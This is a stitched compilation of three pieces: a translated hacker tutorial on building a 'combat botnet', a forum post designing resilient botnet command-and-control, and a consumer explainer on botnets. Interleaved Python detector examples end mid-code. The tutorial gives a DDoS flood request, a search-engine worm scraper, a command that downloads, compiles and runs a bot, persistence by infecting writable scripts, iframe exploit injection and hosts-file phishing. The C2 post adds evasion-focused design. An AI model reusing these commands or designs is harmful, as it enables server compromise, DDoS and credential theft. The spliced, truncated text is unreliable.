Security systems are constantly being improved, programmers are becoming more experienced. Fewer and fewer well-known mistakes are now being made.

[prologue]
The Internet is growing at an enormous pace. It is becoming harder and harder for a hacker to find vulnerabilities. Administrators hire the best security experts to protect their products. Recognize your own thoughts? In fact, the Internet is full of vulnerabilities, but on their own they are of little use. Well, it depends on how you look at it. Now imagine the situation: some online bastard has been bothering you, and you want to punish him. Today we will talk about creating your own combat botnet.
So, what is a “bot”? To the uninitiated, the stupid opponents from computer games that you shoot within two minutes immediately spring to mind. Yes, this is partly true. In our case, a “bot” is a program that executes the commands embedded in it. Nothing special, it seems. Someone will object: “I wrote this when I was five years old: you press a button and the program, ooh-la-la, closes.” Let’s forget childhood. We all know that the possibilities of coding are endless, and it can be used for good and evil. Of course, we always use our developments with good intentions. A “botnet” is a set of bots gathered around one center that execute the owner’s commands simultaneously. Bots, by the way, are aimed mainly at Windows machines. There you can steal passwords, install a SOCKS proxy, or format the hard drive. I will deviate from the rules and tell you how to create a botnet from *nix machines. The main function of our bot is to organize DDoS attacks. This is an ideal way to exploit the wide channels of *nix servers. Let’s do the math. The server that needs to be taken down is on a 100 Mbit channel. That means 10-20 bots sitting on channels of the same width will overwhelm the server in an instant. If you can hide from a single server behind a firewall, then, alas, there is no escape from many bots.

[Write a bot]
You can find the listing of an example bot via the link at the end of the article. Let’s look at the code a little. (Uh, Dream again controls everything via IRC? It’s cooler via the WEB!) Control via IRC was chosen because of its interactivity. Let’s say I want to use local kernel exploits against a couple of servers in the botnet. I simply execute the command SH uname -a through the bot and instantly find the machine I need. Then, by executing another command in the IRC client, I download a backdoor and get an interactive shell for further actions. The possibilities are endless. You will say that such control can be implemented through the WEB, but why reload the page and waste traffic? It is much more convenient to watch everything in real time (although with a botnet of more than 1000 bots it is worth thinking about the convenience of the interface, a common-sense note). Many people think that organizing DDoS is a very difficult matter. Here is an example of a typical attack request:

GET /server.org HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 (X11; U; Windows 5.2 i686)\r\nHost: server.org:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n

That is, we simply send the server a request that forces it to respond, and we keep sending it until the server goes down for lack of bandwidth or CPU time. But will you limit yourself to *nix bots alone? You also need to create a Windows botnet, for example based on AgoBot. To do this, you can add code to the bot that scans the machines connecting to the server where the bot is installed for lsass/dcom vulnerabilities.
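As an added defensive illustration (not code from the original article), here is a small Python detector that reads web-server access logs in combined format and flags what the request above produces on the server side: many identical requests from one source in a short window, plus the internal contradiction in that User-Agent string (it claims both X11 and Windows). The log lines are constructed, and the window and threshold are assumed values.

```python
"""Flag HTTP-flood indicators in combined-format access logs.

Added example, not code from the original article. Sample log lines are
constructed; the 10-second window and 20-request threshold are assumptions
a real deployment would tune.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" format: ip ident user [ts] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return a dict with ip, ts, req, ua for a combined-format line, or None."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FMT),
        "req": m.group("req"),
        "ua": m.group("ua"),
    }


def inconsistent_ua(ua):
    """True when a User-Agent claims the X11 windowing system and Windows at once.

    No real browser sends such a string; the flood request quoted above does.
    """
    low = ua.lower()
    return "x11" in low and "windows" in low


def flag_floods(lines, window_s=10, threshold=20):
    """Return {ip: [reasons]} for sources that look like flood bots.

    "rate": more than `threshold` requests from the source fall inside a
    `window_s`-second sliding window. "inconsistent-ua": at least one of its
    requests carried a contradictory User-Agent.
    """
    recent = defaultdict(deque)   # ip -> timestamps still inside the window
    findings = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue              # malformed line; a real tool would count these
        ip, ts = rec["ip"], rec["ts"]
        q = recent[ip]
        q.append(ts)
        while q and (ts - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) > threshold:
            findings[ip].add("rate")
        if inconsistent_ua(rec["ua"]):
            findings[ip].add("inconsistent-ua")
    return {ip: sorted(reasons) for ip, reasons in findings.items()}


def sample_log():
    """Constructed sample: 30 identical requests in 5 s from one bot, plus one normal client."""
    bot_ua = "Mozilla/4.75 (X11; U; Windows 5.2 i686)"   # UA string from the request above
    base = datetime(2024, 1, 1, 12, 0, 0, tzinfo=timezone.utc)
    lines = []
    for i in range(30):
        ts = (base + timedelta(seconds=i // 6)).strftime(TS_FMT)
        lines.append(f'198.51.100.7 - - [{ts}] "GET /server.org HTTP/1.0" 200 512 "-" "{bot_ua}"')
    ts = base.strftime(TS_FMT)
    lines.append(f'203.0.113.5 - - [{ts}] "GET /index.html HTTP/1.1" 200 2048 "-" '
                 f'"Mozilla/5.0 (Windows NT 10.0; rv:120.0) Gecko/20100101 Firefox/120.0"')
    return lines


if __name__ == "__main__":
    for ip, reasons in flag_floods(sample_log()).items():
        print(ip, ", ".join(reasons))
```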

[Creating a botnet]
Creating a botnet is actually very easy. To do this, we need to find a vulnerability in some web script. The found vulnerability should allow executing shell interpreter commands. When you find a vulnerability, pay attention to the name of the affected file, its title, and the name of the vulnerable system. Now, using this data, you need to build a good search query. For example, let’s take the well-known vulnerability in phpBB <= 2.0.10. The file name is viewtopic.php, and the variable pointing to the forum topic is t. So the search query will look like "Powered by phpBB AND viewtopic.php?t=". The smarter and simpler the query you compose, the more vulnerable servers will take your bait. Every search engine’s query language differs a little, so read its description before composing a query. Now all of this needs to be automated. Sending the query to the search engine is done roughly like this in Perl:

use IO::Socket::INET;

# fetch one page of search results; $n is the page counter of the enclosing loop
$sock = IO::Socket::INET->new(PeerAddr => "search.aol.com", PeerPort => "80", Proto => "tcp") or next;
print $sock "GET /aolcom/search?q=viewtopic.php%3Ft%3D7&Stage=0&page=$n HTTP/1.0\n\n";
@resu = <$sock>;
close($sock);

wget http://server.org/bot.c; gcc bot.c -o bash; chmod +x bash; ./bash;

Here you can see two problems at once: wget and gcc may not be available, or their use may be prohibited. Here fetch, curl and GET, or the lynx console browser, will help us, or we can use the FTP protocol. Its implementation is more complicated, but the advantage is that ftp is everywhere. As for the compiler, you can simply compile the binary in your own shell and hope that everything will be fine with compatibility, or you can rewrite the bot in an interpreted language, Perl or PHP. Each method has its advantages and disadvantages; which one to use is your choice. I am used to squeezing the maximum out of a captured server. After all, a bot on a *nix server only lasts until the first reboot of the machine. There is one interesting way out of this situation: the bot searches for writable interpreted files (.pl, .php) and appends to them the code that downloads and launches the bot.

Or you can create another Windows botnet. This is also easy to implement. It requires a vulnerability in a web browser (Internet Explorer, Opera, Mozilla) that leads to the download and launch of the desired file. Next, an iframe entry is created that loads our malicious code. This entry is added to all index files (or to every file containing HTML code, it all depends on your audacity). The small script Haz, which you will also find in the archive, does this job perfectly. Bugtraq is full of records of critical vulnerabilities in Internet Explorer, so we will also have a botnet on Windows systems (I mentioned its advantages above).

That’s it: run our search worm on a high-speed shell, drink coffee (beer, vodka, tomato juice), go to the IRC channel specified in the bot’s settings and watch the number of your subordinates grow. In conclusion, I want to say hello to everyone who knows me and wish you good luck. Don’t get caught.

The vulnerability in phpBB is relevant up to version 2.0.16, although the developers claim that they fixed it in 2.0.11.

http://_exploits.ath.cx/exploits/data/bots/ http://_www.honeynet.org

Phishing
It is very convenient to use bots for organizing phishing. For this we need special phishing pages that imitate the site we need, and good hosting, a dedicated server or a VDS. You can make such pages yourself, buy them, or find them online; the choice is huge. Most often phishing targets sites such as e-gold.com, paypal.com, citybank.com, usbank.com, ebay.com and others related in one way or another to e-commerce. Next, the Windows bot rewrites the \system32\drivers\etc\hosts file, adding the IP address of your server and assigning it the alias of the site you need. The file format is:

102.54.94.97 e-gold.com
102.54.94.97 paypal.com

That is, when the user types e-gold.com or paypal.com into the browser, he ends up on our server without suspecting anything. In turn, on the phisher’s server, entries for the corresponding domains are added to httpd.conf:

DocumentRoot "/home/e-gold.com/www"
ServerName "www.e-gold.com"
ServerAlias "e-gold.com" "www.e-gold.com"

Of course, the browser’s address bar will show the familiar e-gold.com address, and even an advanced user will log into the site without suspecting anything. To complete the picture, I will add that if the user goes through a proxy server, this method will not work.
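From the defender’s side, the hosts-file rewrite described above is easy to audit. The following Python check is an added example (not code from the article): it parses hosts-file text and reports watched domains that resolve to anything other than loopback, and public addresses shared by several unrelated names, which is the pattern both the phishing trick and the antivirus-site redirection mentioned later produce. The watch list and the sample hosts text are constructed, with the two entries shown above included.

```python
"""Audit a hosts file for entries that hijack well-known domains.

Added example, not code from the original article. The watch list and the
sample hosts text are constructed; the sample uses the mapping shown above.
"""
import ipaddress
from collections import defaultdict

# Assumed watch list of domains an attacker would want to redirect.
WATCHED = {"e-gold.com", "paypal.com", "ebay.com", "usbank.com"}


def parse_hosts(text):
    """Yield (ip_address, hostname) pairs; comments and blank lines are skipped."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                      # not a valid address; ignore the line
        for name in fields[1:]:
            yield ip, name.lower()


def suspicious_entries(text, watched=WATCHED):
    """Return sorted (hostname, ip, reason) tuples for entries worth investigating.

    "watched-domain": a watched domain maps to anything but loopback/unspecified.
    "shared-public-ip": several names share one public address, the pattern the
    hosts-file trick above produces even for domains not on the watch list.
    """
    pairs = list(parse_hosts(text))
    names_per_ip = defaultdict(set)
    for ip, name in pairs:
        names_per_ip[ip].add(name)
    out = []
    for ip, name in pairs:
        harmless = ip.is_loopback or ip.is_unspecified
        bare = name[4:] if name.startswith("www.") else name
        if bare in watched and not harmless:
            out.append((name, str(ip), "watched-domain"))
        elif ip.is_global and len(names_per_ip[ip]) > 1:
            out.append((name, str(ip), "shared-public-ip"))
    return sorted(out)


# Constructed sample hosts file: the two entries from the article plus normal lines.
SAMPLE_HOSTS = """\
# localhost name resolution
127.0.0.1    localhost
::1          localhost
102.54.94.97 e-gold.com
102.54.94.97 paypal.com
102.54.94.97 mail.example.net
192.168.1.10 nas intranet.local
"""

if __name__ == "__main__":
    for name, ip, reason in suspicious_entries(SAMPLE_HOSTS):
        print(f"{name:24s} -> {ip:16s} {reason}")
```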

Bots for every taste
Agobot/Phatbot/Forbot/XtremBot
This is the best family of bots. Written in C++. They have many detection-protection functions and more than 500 modifications thanks to a clearly defined modular structure.
SDBot/RBot/UrBot/UrXBot
Bots that are currently very popular for carrying out DDoS attacks. They have many additional functions, such as opening a SOCKS4 proxy, a keylogger, and an automatic scanner for lsass and dcom vulnerabilities. They can also redirect requests to antivirus company sites to a local server by editing \system32\drivers\etc\hosts and installing a small fake web server on port 80.
DSNX Bots
This bot can conduct DDoS attacks, port scanning and a few other small things.
Q8 Bots
An excellent bot for *nix systems. It is distinguished by compact code (27 KB, a single file) and good functionality. It can be dynamically updated by downloading and launching a new file, implements the basic DDoS techniques (SYN flood, UDP flood) well, can execute system commands, and camouflages itself well in the system.
kaiten
Also a good bot for Unix/Linux systems. Able to open a remote shell on a captured server.
Perl-based bots
These are very small bots written in Perl. Used for DDOS attacks on Unix-based systems.

---
The article has a big bias towards hacking, so if it’s not clear, ask.

It was not for nothing that I published a draft of my note about peer-to-peer networks. Reader comments have been very helpful and inspired me to keep working in this direction. What came out of this, see below the cut.

As the title of the post suggests, today we will only talk about botnets. Let’s forget about file sharing, proxy networks, peer-to-peer blogs and p2p currency for a while.

The word “botnet” should not be understood as something illegal. When a user voluntarily downloads and installs a “bot” in order to donate their traffic and computing resources to the needs of a scientific project, that is also a botnet. Accordingly, the botmaster is not necessarily a criminal. A group of 30 scientists running a scientific project is also a “botmaster”.

1. Managing a botnet through a server

The easiest way to manage bots is to run an IRC/HTTP server. Through it the bots receive commands, and through it they send back the results of their execution.

I draw as best I can :) In this case, an illustration may not be required, but I decided to prepare you for the shock that the rest of the drawings will produce.

  • Very simple implementation, especially in the case of IRC.
  • Fast response from bots.
  • You can issue commands to the entire network or to a specific bot.
  • If the network consists of hundreds of nodes, one channel in DalNet is enough to manage it. For larger networks, you can fork out for inexpensive (about 300 rubles/month) web hosting.
  • In the case of HTTP, the server greatly simplifies the development of a nice UI. This is important if we use the botnet in some web service.
  • Server load. The number of nodes in the largest botnets is measured in the millions. To manage such a crowd, one server is not enough.
  • If something happens to the server (network failure, DDoS, fire in the data center), the network will come to an end.
  • One server is easy to firewall. This can be done both by the provider and by Kaspersky Lab products on the user’s computer.
  • The botmaster is relatively easy to find. Forget about the VPN just once, and expect guests in uniform.
  • In the case of IRC, only bots that are online receive the commands. A bot that enters the channel two minutes after the command was sent will miss it.
  • The number of bots and their IPs can be determined by joining the IRC channel. Protecting the channel with a password will not help, because the password is easy to extract from the bot’s code.

2. Control via IRC network

The logical step to combat the disadvantages of the previous method is to have not one server but several. In my opinion, the easiest way to do this is to set up your own IRC network. In that case all responsibility for transferring data between servers falls on the IRC protocol. On the bot side there is no difference compared to the previous solution.

  • Simple implementation, although you will have to tinker with setting up servers.
  • Bots still respond quickly to commands.
  • You can still issue commands to a specific bot.
  • Load distribution between servers, protection against DDoS and force majeure. Ten good servers may be enough for a network of a million bots.
  • If some servers fail, you can have time to replace them.
  • If you use IRC and are bothered by a thousand bots sitting in one channel, use several channels. Accordingly, you can give different parts of the network different tasks.
  • You'll have to fork out more for servers/VDS.
  • You can firewall all servers at the same time and the botmaster will not have time to replace them.
  • The botmaster is still fairly easy to track down.
  • In the case of IRC, the number of bots and their IPs are still in plain sight.
  • Bots that have just entered the channel miss the commands sent before they arrived.

3. Trust ring

I first heard the term trust ring from my friend Nickolas in the comments to the previous post. It means assigning the function of “servers” to part of the botnet itself.

  • No servers needed.
  • The trust ring can consist of hundreds of nodes. Setting up and controlling that many IRC/HTTP servers is not easy.
  • Bots do not have to be constantly connected to the trust ring. It is enough to check once every 5-10 minutes whether new commands have appeared. Each command must have a TTL during which it is kept in the ring.
  • A large number of “servers” makes the network resilient to all kinds of disasters. When part of the ring dies, the botmaster can give a command to build a new trust ring. Or the ring nodes can do this themselves (digital signatures and the consent of a certain percentage of ring members are required).
  • Let the trust ring consist of 512 nodes, at least 50% of which are constantly online. If there are 1,000,000 bots in the network and each of them is constantly online, there will be fewer than 4,000 bots per ring node. When a bot requests commands (or sends a result) once every 10 minutes, each ring node will be handling an average of 7 connections at a time. Not much for a network of this size, right?
  • Only the botmaster can obtain an accurate list of all bots.
  • You can issue commands to a specific bot or group of bots.
  • Fast response of bots to commands.
  • Botmaster is hard to find.

The only negative I see is the complexity of implementation.

4. Peer-to-peer networks

According to Internet sources, P2P botnets are currently very popular. Among these sources, this one deserves the most attention. Each node in such a network knows only a few “neighboring” nodes. The botmaster sends a command to several network nodes, after which it is passed from neighbor to neighbor.

The list of neighbors is given to a bot once, by a special server. This could be, for example, a hacked website. The server does nothing more; it is only needed when adding nodes to the botnet.

  • The implementation is somewhat simpler than in the previous paragraph.
  • Minimum load on all network nodes. The size of a botnet is practically unlimited.
  • Resistant to DDoS, node shutdowns, etc. It is almost impossible to firewall a p2p botnet.
  • No permanent connections, unlike IRC.
  • A server is still needed, even if only briefly.
  • Nodes die from time to time, which affects the connectivity of the network.
  • To get a list of all bots, you need, for example, to give them a command to access a specific site. In this case, there is no guarantee that only the botmaster will receive the list.
  • To issue a command to a specific node, you must either send it to the entire network or connect to the node directly.
  • Slow response of bots to commands.
  • To send a “long” command, for example, with a list of URLs, you need to use a third-party server, otherwise the bots’ response will slow down even more.
  • It is easier to find a botmaster than in the previous example, due to the use of some kind of server.

Of course, I could be wrong, but in my opinion p2p botnets are much worse than a trust ring. Maybe the antivirus vendors are keeping quiet about something?

5. Complete solution

One way to invent something new and good is to cross something old. We combined a telephone, a computer, a tape recorder, a camera and a video camera and got a smartphone. A computer and climate control in a car will no longer surprise anyone. Let’s stick a fridge magnet onto each yogurt, and sales will skyrocket.

It is important to remember that if the crossing is unsuccessful, we can get a specimen that is good for nothing. Reminds you of genetic algorithms, doesn’t it? Let’s take what seems to be a good idea: a p2p botnet where a trust ring is responsible for assigning neighbors. Then we don’t need any server at all!

But in this case the complexity of implementation increases, albeit slightly, and the remaining problems of the p2p botnet stay unresolved. The gain is insignificant; the score is 1:1.

After sitting for a while with paper and pencil, I came up with the following idea. As far as I know, it has never been voiced before, and I am the first to propose it. Ego +100.

What if the network has two states, “active” and “passive”? In the passive state the botnet operates according to the p2p scheme. The botmaster sends the command “mobilize the troops” and the network turns into a trust ring. In the command, the botmaster must specify the trust-ring nodes and the time for which the network changes state. To make the ring larger, several bots can be commanded to name their neighbors. From then on, all commands are transmitted through the trust ring. It is also responsible for assigning “neighbors” to new nodes. If the TTL of the ring later turns out to be insufficient, the command “extend active state” can be given.

Such a botnet will not inherit any of the disadvantages of a p2p network and will have all the advantages of a trust ring, as well as the following:

  • Increased resistance to DDoS attacks and network filters, like a p2p network.
  • Minimal resource consumption by bots while the network is idle. The botmaster does not need to monitor the state of the trust ring and select new nodes for it.
  • When creating a trust ring, only nodes that are currently online are selected. Bots will connect to the ring on the first try (for a while).
  • The list of “neighbors” is periodically refreshed. After all, the entire botnet knows the IPs of the nodes included in the temporary ring, so let them treat those nodes as neighbors if some of the real neighbors have not appeared on the network for a long time.

And the only drawback I see here is the complexity of implementation. But that isn’t really a problem.

6. Things to remember

Until now, I have kept silent about some points, because they are inherent in any of the named methods of managing a botnet. You should pay attention to them.

  • Some nodes cannot accept incoming connections due to a firewall or NAT. At a minimum, this needs to be taken into account when writing a bot. For example, when distributing commands in a p2p network, the bot itself must periodically contact its neighbors, and not wait for commands from them.
  • It should be assumed that all commands sent to the network are eavesdropped on. At a minimum, an interested party can modify the bot’s code for this purpose. Nevertheless, it makes sense to encrypt all traffic sent over the network; at a minimum, this will complicate analysis of the botnet.
  • All botmaster commands must be digitally signed. Passwords are not good because they can be intercepted.
  • Since we are talking about implementation, I note that any botnet must have at least three commands - updating bots, updating the botmaster key, and self-destructing the entire network.
  • There are “spy” nodes on the network. Some of them are included in the trust ring. At the same time, we do not know the goals these “spies” are pursuing: identifying the botmaster’s IP, disrupting the execution of commands, disabling the network, gaining control over the botnet, and so on. Specifically, this means that bots must choose a random node when connecting to the ring, rather than always using the same one.
  • In the figure, the trust-ring nodes are connected to each other in a full mesh, but it is much more practical to implement the ring as a small p2p network, that is, on the “neighbors” principle.

I will also note that solutions 1 and 2 (server, many servers) lose many of their disadvantages and gain a couple of advantages from solution 3 (trust ring) when using the HTTP protocol. Scroll through those points again to see what I mean.

7. Conclusions

For small networks, a good choice is IRC. For example, if you want to create your own small network for distributed computing, install the bot on your home computer, laptop, netbook and work computer (if company policy allows it) and manage the network via DalNet. If necessary, the network can later be “upgraded” to a trust ring. You will provide the appropriate command, right?

If the botnet needs a nice web interface, it might make sense to write an additional program that will take commands from the web server and send them to IRC. At least consider this approach.

Universal solutions are the trust ring and p2p + trust ring. Such networks will work fine no matter how many nodes they have, 1 or 1,000,000, without any servers.

Given the obvious disadvantages of pure p2p compared to a ring, it remains unclear to me why it is considered a good solution. Surely the bots that make up such a network contain many useful functions. Why not add another small payload: mobilizing the network into a trust ring?

That's probably all. I will be glad to see any of your comments. Especially with criticism, pointing out inaccuracies/contradictions in the text and your ideas about the topic raised.

Today, botnets have become one of the main tools of cybercriminals. ComputerBild will tell you what botnets are, how they work, and how to keep your computer from falling into a zombie network.

A botnet, or zombie network, is a network of computers infected with malware that allows attackers to remotely control other people's machines without their owners' knowledge. In recent years, zombie networks have become a stable source of income for cybercriminals. Consistently low costs and a minimum of knowledge required to manage botnets contribute to the growth of popularity, and therefore the number of botnets. Attackers and their customers earn thousands of dollars from DDoS attacks or spam mailings carried out using zombie networks.

Is my computer infected with a bot?

It is not easy to answer this question. The fact is that it is almost impossible to notice bots interfering with the daily operation of a PC, since they do not noticeably affect system performance. Nevertheless, there are several signs by which you can determine that there is a bot in the system:

  • Unknown programs try to connect to the Internet, which the firewall or antivirus software periodically and indignantly reports;
  • Internet traffic becomes very high, although you use the Internet very sparingly;
  • New entries appear in the list of running system processes, masquerading as normal Windows processes (for example, a bot may be named scvhost.exe, a name very similar to that of the Windows system process svchost.exe; the difference is quite hard to notice, but it is possible).
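The third sign, a process name one typo away from a real system process, can be checked mechanically rather than by eye. The Python below is an added example (not from the article): it measures the edit distance (insertions, deletions, substitutions and adjacent swaps) between each running process name and a reference list of Windows system processes, and reports near misses such as scvhost.exe against svchost.exe. The reference list and the sample process list are constructed, and the distance cutoff of 1 is an assumption.

```python
"""Spot process names that imitate legitimate Windows system processes.

Added example, not code from the original article. The reference list and
the sample process list are constructed; the cutoff of 1 edit is an
assumption (svchost.exe vs. scvhost.exe differ by one transposition).
"""

# Well-known Windows system process names (assumed reference list).
KNOWN_SYSTEM = {
    "svchost.exe", "lsass.exe", "csrss.exe", "smss.exe", "winlogon.exe",
    "services.exe", "explorer.exe", "wininit.exe", "spoolsv.exe",
}


def osa_distance(a, b):
    """Optimal-string-alignment distance: edits plus adjacent transpositions.

    Insertions, deletions, substitutions and swaps of two neighbouring
    characters each count as one edit, so "scvhost" is distance 1 from "svchost".
    """
    rows, cols = len(a) + 1, len(b) + 1
    d = [[0] * cols for _ in range(rows)]
    for i in range(rows):
        d[i][0] = i
    for j in range(cols):
        d[0][j] = j
    for i in range(1, rows):
        for j in range(1, cols):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,          # deletion
                          d[i][j - 1] + 1,          # insertion
                          d[i - 1][j - 1] + cost)   # substitution
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)   # transposition
    return d[rows - 1][cols - 1]


def lookalikes(process_names, known=KNOWN_SYSTEM, max_distance=1):
    """Return sorted (seen_name, imitated_name, distance) for near-miss names.

    Exact matches (case-insensitive) are legitimate and skipped; any other name
    within `max_distance` edits of a known system process name is reported.
    """
    hits = []
    for raw in process_names:
        name = raw.lower()
        if name in known:
            continue
        best = min(known, key=lambda k: osa_distance(name, k))
        dist = osa_distance(name, best)
        if dist <= max_distance:
            hits.append((raw, best, dist))
    return sorted(hits)


# Constructed process list: real names, a benign application and three imitators.
SAMPLE_PROCESSES = [
    "svchost.exe", "scvhost.exe", "lsasss.exe", "firefox.exe",
    "explorer.exe", "svch0st.exe", "System",
]

if __name__ == "__main__":
    for seen, real, dist in lookalikes(SAMPLE_PROCESSES):
        print(f"{seen:14s} imitates {real:14s} (distance {dist})")
```

A real scan would also compare each process's image path against the expected system directory, since a legitimate name launched from a user-writable folder is just as telling.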

Why are botnets created?

Botnets are created to make money. There are several areas of commercially profitable use of zombie networks: DDoS attacks, collecting confidential information, sending spam, phishing, search spam, cheating click counters, etc. It should be noted that any direction the attacker chooses will be profitable, and a botnet allows all of these activities to be carried out simultaneously.

A DDoS attack (Distributed Denial of Service) is an attack on a computer system, for example a website, whose goal is to bring the system down, that is, into a state where it can no longer accept and process requests from legitimate users. One of the most common methods of carrying out a DDoS attack is sending numerous requests to the victim computer or website, which leads to a denial of service if the resources of the attacked computer are insufficient to process all incoming requests. DDoS attacks are a formidable weapon for hackers, and a botnet is an ideal tool for carrying them out.

DDoS attacks can be both a means of unfair competition and acts of cyber terrorism. The owner of a botnet can provide a service to any not too scrupulous entrepreneur - carry out a DDoS attack on the website of his competitor. After such a load, the attacked resource will “go down”, the attacker will receive a temporary advantage, and the cybercriminal will receive a modest (or not very) reward.

In the same way, botnet owners themselves can use DDoS attacks to extort money from large companies. Companies often prefer to comply with the demands of cybercriminals, since eliminating the consequences of successful DDoS attacks is very expensive. For example, in January 2009, one of the largest hosting providers, GoDaddy.com, suffered a DDoS attack, as a result of which thousands of sites hosted on its servers were unavailable for almost a day. The provider’s financial losses were huge.

In February 2007, a series of attacks were carried out on root DNS servers, on the operation of which the normal functioning of the entire Internet directly depends. It is unlikely that the purpose of these attacks was to collapse the World Wide Web, since the existence of zombie networks is only possible if the Internet exists and functions normally. Most of all, it was like a demonstration of the power and capabilities of zombie networks.

Advertisements for DDoS attack services are openly posted on many relevant forums. Prices for attacks range from 50 to several thousand dollars per day of continuous operation of a DDoS botnet. According to the website www.shadowserver.org, in 2008 about 190 thousand DDoS attacks were carried out, from which cybercriminals were able to earn about 20 million dollars. Naturally, this amount does not include income from blackmail, which is simply impossible to calculate.

Collection of confidential information

Confidential information stored on users’ computers will always attract attackers. Of greatest interest are credit card numbers, financial information and passwords for various services: mailboxes, FTP servers, instant messengers, etc. At the same time, modern malware allows attackers to pick out exactly the data they are interested in; to do this, it is enough to download the corresponding module to the PC.

Attackers can either sell the stolen information or use it to their advantage. On numerous forums on the Internet, hundreds of advertisements for the sale of bank accounts appear every day. The cost of the account depends on the amount of money in the user's account and ranges from $1 to $1,500 per account. The lower limit indicates that in the course of competition, cybercriminals engaged in this type of business are forced to reduce prices. To really earn a lot, they need a stable influx of fresh data, and for this a stable growth of zombie networks is required. Financial information is especially interesting for carders - criminals involved in counterfeiting bank cards.

How profitable such operations are can be judged by the well-known story of a group of Brazilian cybercriminals who were arrested two years ago. They were able to withdraw $4.74 million from the bank accounts of ordinary users using information stolen from computers. Criminals who are involved in forging documents, opening false bank accounts, making illegal transactions, etc. are also interested in acquiring personal data that is not directly related to the user’s money.

Another type of information collected by botnets is email addresses, and, unlike credit card and account numbers, many email addresses can be harvested from the address book of a single infected PC. The collected addresses are put up for sale, sometimes “in bulk”, by the megabyte. The main buyers of such “goods” are spammers. A list of a million e-mail addresses costs from 20 to 100 dollars, and a mailing ordered from spammers to the same million addresses costs 150-200 dollars. The benefit is obvious.

Criminals are also interested in accounts for various paid services and online stores. Of course, they are cheaper than bank accounts, but selling them carries a lower risk of prosecution by law enforcement agencies.

Millions of spam messages circulate around the world every day. Sending unsolicited mail is one of the main functions of modern botnets. According to Kaspersky Lab, about 80% of all spam is sent through zombie networks. Billions of letters advertising Viagra, copies of expensive watches, online casinos, etc. are sent from the computers of law-abiding users, clogging communication channels and mailboxes. In this way, hackers put the computers of innocent users at risk: the addresses from which the mailings are sent end up on the blacklists of antivirus companies.

In recent years, the range of spam services has expanded: ICQ spam has appeared, as has spam in social networks, forums and blogs. And this is also a “merit” of botnet owners: after all, it is not at all difficult to add another module to the bot client, which opens up horizons for new business with slogans like “Spam on Facebook. Inexpensive.” Spam prices vary depending on the target audience and the number of addresses to which the mailing is sent. Prices for targeted mailings range from $70 for hundreds of thousands of addresses to $1,000 for several tens of millions of addresses. Over the past year, spammers earned about $780 million from sending emails.

Creating search spam

Another use case for botnets is to increase the popularity of websites in search engines. Working on search engine optimization, resource administrators try to increase the site’s position in search results, since the higher it is, the more visitors will access the site through search engines and, therefore, the greater the site owner’s revenue, for example, from the sale of advertising space on web pages. Many companies pay webmasters a lot of money to bring their website to the top positions in search engines. Botnet owners took advantage of some of their techniques and automated the search engine optimization process.

When you see, in the comments to your LiveJournal post or under a successful photo on a photo-hosting site, a lot of links left by someone unknown to you, and sometimes by your “friend”, don’t be surprised: someone has simply ordered the promotion of their resource from botnet owners. A specially created program is downloaded onto a zombie computer and, on behalf of its owner, leaves comments on popular resources with links to the site being promoted. The average price for illegal search spam services is about $300 per month.

How much does personal data cost?

The cost of stolen personal data directly depends on the country in which its rightful owner lives. For example, complete data of a US resident costs 5-8 dollars. On the black market, the data of residents of the European Union is especially valuable - it is two to three times more expensive than the data of citizens of the United States and Canada. This can be explained by the fact that such data can be used by criminals in any EU country. The average price around the world for a complete package of data about one person is about $7.

Unfortunately, for those who decide to organize a botnet from scratch, it is not hard to find instructions on the Internet for creating a zombie network. The first step is to build the zombie network itself. To do this, users’ computers must be infected with a special program, the bot. For infection, spam mailings, messages posted on forums and social networks and other techniques are used; often the bot is also equipped with a self-propagation function, like a virus or worm.

Social engineering techniques are used to force a potential victim to install a bot. For example, they offer to watch an interesting video, which requires downloading a special codec. After downloading and running such a file, the user, of course, will not be able to watch any video and most likely will not notice any changes at all, and his PC will be infected and become an obedient servant, carrying out all the commands of the botnet owner.

The second widely used method of bot infection is the drive-by download. When a user visits an infected web page, malicious code is downloaded onto his computer through various “holes” in applications, primarily in popular browsers. Special programs, exploits, are used to take advantage of these weak points. They allow not only the silent download but also the silent launch of a virus or bot. This type of malware distribution is the most dangerous, because if a popular resource is hacked, tens of thousands of users will become infected!

The bot can be equipped with a function for spreading across computer networks. For example, it can spread by infecting all available executable files or by searching for and infecting vulnerable computers on the network.

The botnet creator controls the infected computers of unsuspecting users from the botnet’s command center, contacting the bots through an IRC channel, a web connection, or any other available means. It is enough to connect several dozen machines into a network for the botnet to begin generating income for its owner. Moreover, this income is linearly dependent on the stability of the zombie network and its growth rate.
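From the defender’s side, the polling described above (each bot repeatedly contacting the same command center over IRC or HTTP) is visible in ordinary firewall or proxy logs as “beaconing”: outbound connections from one host to one destination at a near-constant interval. The following is an added example, not code from the article or from Kaspersky Lab; the log line format, the sample addresses and the jitter threshold are all constructed assumptions.

```python
"""Flag outbound flows whose connections recur at a near-constant interval,
the way a bot polling its command center looks in firewall logs.

Added example; the log format "<ISO timestamp> <src_ip> -> <dst_ip>:<port>"
and all addresses are constructed for illustration.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample log: 192.0.2.10 polls an IRC port every 60 s,
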